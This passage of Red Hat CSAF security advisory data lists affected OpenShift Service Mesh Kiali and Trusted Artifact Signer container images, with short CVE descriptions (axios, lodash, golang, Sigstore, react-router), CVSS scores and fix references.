"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:e0e03701e6d67c1cc45566e5ce63708ccb054311cb469cded467f2d597b0a3ed_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:e0e03701e6d67c1cc45566e5ce63708ccb054311cb469cded467f2d597b0a3ed_ppc64le",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:e0e03701e6d67c1cc45566e5ce63708ccb054311cb469cded467f2d597b0a3ed_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel9@sha256%3Ae0e03701e6d67c1cc45566e5ce63708ccb054311cb469cded467f2d597b0a3ed?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771372940"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:b28e264e46083f9004963e1ccebe25c01d9084d1c8489f3333c0eed2ea64ca35_s390x",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:b28e264e46083f9004963e1ccebe25c01d9084d1c8489f3333c0eed2ea64ca35_s390x",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:b28e264e46083f9004963e1ccebe25c01d9084d1c8489f3333c0eed2ea64ca35_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9@sha256%3Ab28e264e46083f9004963e1ccebe25c01d9084d1c8489f3333c0eed2ea64ca35?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771373071"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:04b9efc9b9d4399cddc620cadbc4aa47636e8e90a8af43f8a28205736db82bbe_s390x",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:04b9efc9b9d4399cddc620cadbc4aa47636e8e90a8af43f8a28205736db82bbe_s390x",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:04b9efc9b9d4399cddc620cadbc4aa47636e8e90a8af43f8a28205736db82bbe_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel9@sha256%3A04b9efc9b9d4399cddc620cadbc4aa47636e8e90a8af43f8a28205736db82bbe?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771372940"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:04b9efc9b9d4399cddc620cadbc4aa47636e8e90a8af43f8a28205736db82bbe_s390x as a component of Red Hat OpenShift Service Mesh 3",
"product_id": "Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:04b9efc9b9d4399cddc620cadbc4aa47636e8e90a8af43f8a28205736db82bbe_s390x"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:04b9efc9b9d4399cddc620cadbc4aa47636e8e90a8af43f8a28205736db82bbe_s390x",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:38243f02786d10064768d4355d8ba80eb5c0892c912730682c58c6b259629a98_arm64 as a component of Red Hat OpenShift Service Mesh 3",
"product_id": "Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:38243f02786d10064768d4355d8ba80eb5c0892c912730682c58c6b259629a98_arm64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:38243f02786d10064768d4355d8ba80eb5c0892c912730682c58c6b259629a98_arm64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:e0e03701e6d67c1cc45566e5ce63708ccb054311cb469cded467f2d597b0a3ed_ppc64le as a component of Red Hat OpenShift Service Mesh 3",
"product_id": "Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:e0e03701e6d67c1cc45566e5ce63708ccb054311cb469cded467f2d597b0a3ed_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:e0e03701e6d67c1cc45566e5ce63708ccb054311cb469cded467f2d597b0a3ed_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:f342935b5de0a471c12d3396374d2075381ff9aec4d75eabd3c6b26346e501d6_amd64 as a component of Red Hat OpenShift Service Mesh 3",
"product_id": "Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:f342935b5de0a471c12d3396374d2075381ff9aec4d75eabd3c6b26346e501d6_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:f342935b5de0a471c12d3396374d2075381ff9aec4d75eabd3c6b26346e501d6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6cb5db65d47da4e5761ae6c7b73b1c1fd889195e7021569ca41a30f91bbba375_arm64 as a component of Red Hat OpenShift Service Mesh 3",
"product_id": "Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6cb5db65d47da4e5761ae6c7b73b1c1fd889195e7021569ca41a30f91bbba375_arm64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6cb5db65d47da4e5761ae6c7b73b1c1fd889195e7021569ca41a30f91bbba375_arm64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:b28e264e46083f9004963e1ccebe25c01d9084d1c8489f3333c0eed2ea64ca35_s390x as a component of Red Hat OpenShift Service Mesh 3",
"product_id": "Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:b28e264e46083f9004963e1ccebe25c01d9084d1c8489f3333c0eed2ea64ca35_s390x"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:b28e264e46083f9004963e1ccebe25c01d9084d1c8489f3333c0eed2ea64ca35_s390x",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:d014dc5331b395c2dbf42011f92b3ebd728b8078d3c16068d658cd42bd6f210d_ppc64le as a component of Red Hat OpenShift Service Mesh 3",
"product_id": "Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:d014dc5331b395c2dbf42011f92b3ebd728b8078d3c16068d658cd42bd6f210d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:d014dc5331b395c2dbf42011f92b3ebd728b8078d3c16068d658cd42bd6f210d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:f3cc238553d49a1c5b3764f73eb507dc8d9edf9bea02e7168f78e2e7ac77682f_amd64 as a component of Red Hat OpenShift Service Mesh 3",
"product_id": "Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:f3cc238553d49a1c5b3764f73eb507dc8d9edf9bea02e7168f78e2e7ac77682f_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:f3cc238553d49a1c5b3764f73eb507dc8d9edf9bea02e7168f78e2e7ac77682f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:04b9efc9b9d4399cddc620cadbc4aa47636e8e90a8af43f8a28205736db82bbe_s390x",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:38243f02786d10064768d4355d8ba80eb5c0892c912730682c58c6b259629a98_arm64",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:e0e03701e6d67c1cc45566e5ce63708ccb054311cb469cded467f2d597b0a3ed_ppc64le",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:f342935b5de0a471c12d3396374d2075381ff9aec4d75eabd3c6b26346e501d6_amd64",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6cb5db65d47da4e5761ae6c7b73b1c1fd889195e7021569ca41a30f91bbba375_arm64",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:b28e264e46083f9004963e1ccebe25c01d9084d1c8489f3333c0eed2ea64ca35_s390x",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:d014dc5331b395c2dbf42011f92b3ebd728b8078d3c16068d658cd42bd6f210d_ppc64le",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:f3cc238553d49a1c5b3764f73eb507dc8d9edf9bea02e7168f78e2e7ac77682f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-23T17:14:27+00:00",
"details": "See Kiali 2.4.13 documentation at https://docs.redhat.com/en/documentation/red_hat_openshift_service_mesh/3.0/html/observability/kiali-operator-provided-by-red-hat",
"product_ids": [
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:04b9efc9b9d4399cddc620cadbc4aa47636e8e90a8af43f8a28205736db82bbe_s390x",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:38243f02786d10064768d4355d8ba80eb5c0892c912730682c58c6b259629a98_arm64",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:e0e03701e6d67c1cc45566e5ce63708ccb054311cb469cded467f2d597b0a3ed_ppc64le",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:f342935b5de0a471c12d3396374d2075381ff9aec4d75eabd3c6b26346e501d6_amd64",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6cb5db65d47da4e5761ae6c7b73b1c1fd889195e7021569ca41a30f91bbba375_arm64",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:b28e264e46083f9004963e1ccebe25c01d9084d1c8489f3333c0eed2ea64ca35_s390x",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:d014dc5331b395c2dbf42011f92b3ebd728b8078d3c16068d658cd42bd6f210d_ppc64le",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:f3cc238553d49a1c5b3764f73eb507dc8d9edf9bea02e7168f78e2e7ac77682f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3106"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:04b9efc9b9d4399cddc620cadbc4aa47636e8e90a8af43f8a28205736db82bbe_s390x",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:38243f02786d10064768d4355d8ba80eb5c0892c912730682c58c6b259629a98_arm64",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:e0e03701e6d67c1cc45566e5ce63708ccb054311cb469cded467f2d597b0a3ed_ppc64le",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:f342935b5de0a471c12d3396374d2075381ff9aec4d75eabd3c6b26346e501d6_amd64",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6cb5db65d47da4e5761ae6c7b73b1c1fd889195e7021569ca41a30f91bbba375_arm64",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:b28e264e46083f9004963e1ccebe25c01d9084d1c8489f3333c0eed2ea64ca35_s390x",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:d014dc5331b395c2dbf42011f92b3ebd728b8078d3c16068d658cd42bd6f210d_ppc64le",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:f3cc238553d49a1c5b3764f73eb507dc8d9edf9bea02e7168f78e2e7ac77682f_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:04b9efc9b9d4399cddc620cadbc4aa47636e8e90a8af43f8a28205736db82bbe_s390x",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:38243f02786d10064768d4355d8ba80eb5c0892c912730682c58c6b259629a98_arm64",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:e0e03701e6d67c1cc45566e5ce63708ccb054311cb469cded467f2d597b0a3ed_ppc64le",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:f342935b5de0a471c12d3396374d2075381ff9aec4d75eabd3c6b26346e501d6_amd64",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6cb5db65d47da4e5761ae6c7b73b1c1fd889195e7021569ca41a30f91bbba375_arm64",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:b28e264e46083f9004963e1ccebe25c01d9084d1c8489f3333c0eed2ea64ca35_s390x",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:d014dc5331b395c2dbf42011f92b3ebd728b8078d3c16068d658cd42bd6f210d_ppc64le",
"Red Hat OpenShift Service Mesh 3:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:f3cc238553d49a1c5b3764f73eb507dc8d9edf9bea02e7168f78e2e7ac77682f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
}
]
}
RHSA-2026:3087
Vulnerability from csaf_redhat - Published: 2026-02-23 13:35 - Updated: 2026-04-16 10:28A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.
A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.
A flaw was found in Sigstore Timestamp Authority. This vulnerability allows a denial of service via excessive memory allocation when processing a specially crafted Object Identifier or Content-Type header.
A cross site scripting flaw has been discovered in the npm react-router and @remix-run/router packages. React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The 1.3.2 release of Red Hat Trusted Artifact Signer OpenShift Operator.\nFor more details please visit the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3",
"title": "Topic"
},
{
"category": "general",
"text": "The RHTAS Operator can be used with OpenShift Container Platform 4.16, 4.17, 4.18, 4.19 and 4.20",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:3087",
"url": "https://access.redhat.com/errata/RHSA-2026:3087"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3",
"url": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index",
"url": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-13465",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61729",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-66564",
"url": "https://access.redhat.com/security/cve/CVE-2025-66564"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-22029",
"url": "https://access.redhat.com/security/cve/CVE-2026-22029"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_3087.json"
}
],
"title": "Red Hat Security Advisory: RHTAS 1.3.2 - Red Hat Trusted Artifact Signer Release",
"tracking": {
"current_release_date": "2026-04-16T10:28:07+00:00",
"generator": {
"date": "2026-04-16T10:28:07+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:3087",
"initial_release_date": "2026-02-23T13:35:49+00:00",
"revision_history": [
{
"date": "2026-02-23T13:35:49+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-02-23T13:37:45+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T10:28:07+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Trusted Artifact Signer 1.3",
"product": {
"name": "Red Hat Trusted Artifact Signer 1.3",
"product_id": "Red Hat Trusted Artifact Signer 1.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:trusted_artifact_signer:1.3::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Trusted Artifact Signer"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64",
"product": {
"name": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64",
"product_id": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhtas-console-rhel9@sha256%3A9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8?arch=amd64\u0026repository_url=registry.redhat.io/rhtas\u0026tag=1771324865"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64",
"product": {
"name": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64",
"product_id": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhtas-console-ui-rhel9@sha256%3Ae7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e?arch=amd64\u0026repository_url=registry.redhat.io/rhtas\u0026tag=1771324807"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64 as a component of Red Hat Trusted Artifact Signer 1.3",
"product_id": "Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64"
},
"product_reference": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64 as a component of Red Hat Trusted Artifact Signer 1.3",
"product_id": "Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
},
"product_reference": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-13465",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2026-01-21T20:01:28.774829+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431740"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "lodash: prototype pollution in _.unset and _.omit functions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is only exploitable by applications using the _.unset and _.omit functions on an object and allowing user input to determine the path of the property to be removed. This issue only allows the deletion of properties but does not allow overwriting their behavior, limiting the impact to a denial of service. Due to this reason, this vulnerability has been rated with an important severity.\n\nIn Grafana, JavaScript code runs only in the browser, while the server side is all Golang. Therefore, the worst-case scenario is a loss of functionality in the client application inside the browser. To reflect this, the CVSS availability metric and the severity of the Grafana and the Grafana-PCP component have been updated to low and moderate, respectively.\n\nThe lodash dependency is bundled and used by the pcs-web-ui component of the PCS package. In Red Hat Enterprise Linux 8.10, the pcs-web-ui component is no longer included in the PCS package. As a result, RHEL 8.10 does not ship the vulnerable lodash component within PCS and is therefore not-affected by this CVE.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "RHBZ#2431740",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431740"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-13465",
